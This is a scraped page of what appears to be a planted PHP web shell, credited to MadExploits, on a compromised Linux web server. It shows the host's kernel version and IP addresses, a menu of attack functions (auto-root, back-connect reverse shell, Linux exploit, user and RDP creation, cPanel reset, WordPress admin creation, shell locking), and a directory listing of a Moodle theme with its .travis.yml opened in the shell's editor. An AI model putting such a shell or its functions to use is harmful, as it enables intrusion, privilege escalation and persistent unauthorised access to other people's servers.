Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.127.69
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
theme /
moove /
[ HOME SHELL ]
Name
Size
Permission
Action
amd
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
layout
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
pix_core
[ DIR ]
drwxr-xr-x
pix_plugins
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.gitignore
63
B
-rw-r--r--
.stylelintrc
205
B
-rw-r--r--
.travis.yml
953
B
-rw-r--r--
Gruntfile.js
3.33
KB
-rw-r--r--
README.md
1.58
KB
-rw-r--r--
certificates.php
2.08
KB
-rw-r--r--
composer.json
196
B
-rw-r--r--
config.php
5.44
KB
-rw-r--r--
lib.php
13.02
KB
-rw-r--r--
package-lock.json
119.25
KB
-rw-r--r--
package.json
751
B
-rw-r--r--
settings.php
32.53
KB
-rw-r--r--
thirdpartylibs.xml
616
B
-rw-r--r--
version.php
1.53
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .travis.yml
language: php sudo: true addons: firefox: "latest" postgresql: "9.4" services: - mysql - postgresql cache: directories: - $HOME/.composer/cache - $HOME/.npm php: - 7.1 - 7.2 - 7.3 - 7.4 env: global: - MOODLE_BRANCH=MOODLE_38_STABLE matrix: - DB=pgsql - DB=mysqli before_install: - phpenv config-rm xdebug.ini - nvm install 14.0.0 - nvm use 14.0.0 - cd ../.. - composer create-project -n --no-dev --prefer-dist blackboard-open-source/moodle-plugin-ci ci ^2 - export PATH="$(cd ci/bin; pwd):$(cd ci/vendor/bin; pwd):$PATH" install: - moodle-plugin-ci install script: - moodle-plugin-ci phplint # - moodle-plugin-ci phpcpd - moodle-plugin-ci phpmd - moodle-plugin-ci codechecker - moodle-plugin-ci validate - moodle-plugin-ci savepoints # - moodle-plugin-ci mustache # - moodle-plugin-ci grunt - moodle-plugin-ci phpdoc - moodle-plugin-ci phpunit - moodle-plugin-ci behat
Close